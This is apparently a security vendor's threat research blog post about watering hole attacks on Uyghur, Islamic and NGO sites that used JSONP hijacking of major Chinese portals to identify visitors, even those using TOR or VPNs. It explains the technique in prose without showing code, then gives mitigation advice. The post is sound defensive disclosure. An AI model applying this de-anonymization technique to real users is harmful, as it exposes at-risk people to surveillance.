By: Eddie Lee and Jaime Blasco

Imagine if an authoritarian state had a tool to get private information about users visiting certain websites, including real names, mail addresses, sex, birthdays, phone numbers, etc. Imagine that even users that run TOR or VPN connections to bypass the tools that the authoritarian government uses to block and monitor these websites were exposed to this technique.

In this blog post we are going to describe a series of watering hole attacks that have been targeting NGO, Uyghur and Islamic websites since at least October 2013, with the most recent attack discovered a few days ago. We want to thank Sumayah Alrwais, a PhD student in the system security lab at Indiana University, for discovering and notifying us through RSA Labs about this latest watering hole attack affecting the Chinese website of an international NGO.

A Watering Hole is a technique where the attacker wants to target a particular group (company, industry, ethnic, etc). The attackers compromise websites used by the group and include malicious content that gets executed when users access the affected websites.

Typically, attackers gain access to a victim’s system by including an iframe or JavaScript file from a malicious server to exploit a vulnerability in Internet Explorer, Java, or Flash. Some examples we have documented in the past are:

In other cases we have discovered Watering Holes where the attackers use reconnaissance techniques to extract information about software installed on a victim’s machine or even using a JavaScript keylogger to steal credentials:

In addition to this, it is not the first time we have documented cyber espionage campaigns targeting China’s Uyghur minority:

The latest attack that we are describing is a novel technique that we haven’t seen before with watering hole attacks. Let’s describe how it works:

The attackers compromise several Chinese-language websites associated with NGOs, Uyghur communities and Islamic associations.

The attackers modify the content of the website and include a JavaScript file from a malicious server.

The JavaScript file exploits JSONP Hijacking vulnerabilities in more than 15 different major Chinese websites including the Top 5 portals used in China (see table below).

Using JSONP requests, the attackers are able to bypass cross-domain policies and collect a user’s private information if the user is logged in to one of the affected services.

The JavaScript code then sends the user’s private data collected to an attacker-controlled server.

When we started to write this blog post we weren’t going to publish the list of affected services; however, after doing a bit of research, we found the same vulnerabilities have been public since 2013! Details of the vulnerabilities are mentioned in a Chinese security blog as well as several Chinese forums.

To describe the severity of the issue, we are showing a list of Alexa ratings for the affected services and the personal data the attackers are able to steal:

JSONP is a widely used technique to make cross-domain JavaScript requests that bypass the same-origin policy. However, bypassing the same-origin policy can lead to information leakage between different origins or domains. This is especially dangerous when JSONP contains user data. Since JSONP requests/responses bypass the same-origin policy, malicious sites can cause victims to make cross-domain JSONP requests and read the private data using the “script” tag.

Let’s see an example from the malicious JavaScript found in one of the Watering Holes that we have analyzed.

First the malicious JavaScript makes a JSONP request to one of the vulnerable services using the <script> tag. As you can see below, the script requests the renren_all callback

The vulnerable site responds with the following content:

When the browser receives the data, it calls the renren_all callback function that prepares the personal data including sex, birthday, real name and user ID to be sent to an attacker-controlled server.

After all the JSONP requests have been made, the malicious JavaScript sends the data to an attacker-controlled server:

Implications to privacy and attribution

All of the Watering Holes that we have observed are targeting Chinese users visiting Uyghur or Islam-related websites or NGOs sympathetic to freedom of speech. It looks like this campaign has been targeting a very small group of people, and since there is no financial gain on collecting most of the leaked personal data, we can say that whoever is behind these attacks is looking to reveal the identity of the users visiting certain websites. Another point is that some of the affected websites are hosted outside of China, and the Great Firewall likely blocks some of those sites. According to The China Story Project, one of the main categories of foreign websites that was blocked in China was regarding “Web pages belonging to organizations that campaign against the Communist Party or that promote Tibetan and Uyghur causes or independence for Taiwan, as well as sites belonging to the banned religious organization Falun Gong.”

In general, the Great Firewall (GFW) is able to analyze and block traffic that is leaving China; however, this is not necessarily true when Chinese users run VPNs (Virtual Private Networks) or TOR. In these cases, the GFW doesn’t have full visibility into the traffic that goes through VPNs or TOR. When plaintext traffic comes out of VPNs or TOR endpoints, the GFW doesn’t know the real IP address of the user that is visiting a specific website.

Now imagine that the Chinese government wants to know the real identities of individuals visiting certain websites that are sympathetic to certain causes, people who are exiled, or specific people living abroad even when they use TOR or VPNs. In the scenario we have described, this is a reality and has been happening since 2013. Even if the only data the attackers can obtain is a user ID for a specific website, this information can be used to pinpoint targets for espionage within the GFW.

Recommendations

First of all, the list of affected sites (Baidu, Taobao, etc.) should fix the JSONP Hijacking vulnerabilities. There are several ways to do this:

- Include a random value in all the JSONP requests (this also works to prevent CSRF attacks)

- Use CORS instead of JSONP

- Don’t use cookies (e.g. session identifiers) to customize JSONP responses

- Don’t include private/user data in JSONP responses

The recommendation for users is be vigilant and follow best practices when browsing the Web, especially if you live in an authoritarian country or you are worried about being tracked. For example, do not browse sensitive websites after logging into another website - even in a different tab or window.

It is really important to understand the differences between anonymity and privacy. For instance, if you are using TOR or a VPN service that encrypts your communications, it is going to give you a certain level of privacy, but your anonymity is still at risk. Anonymity is the idea of being “non-identifiable” or un-trackable, but as we have described in this blog post it is hard to remain anonymous if you are using services where you have revealed personal information and you browse other sites that can exploit vulnerabilities to access your personal information.

[Update: 06/15/2015]

We would like to thank you Citizen Labs for helping us with victim notification. On the other hand we want to point out that every TOR user should be using the TOR browser that is more suitable to browse the web to prevent these kind of attacks and other privacy related issues.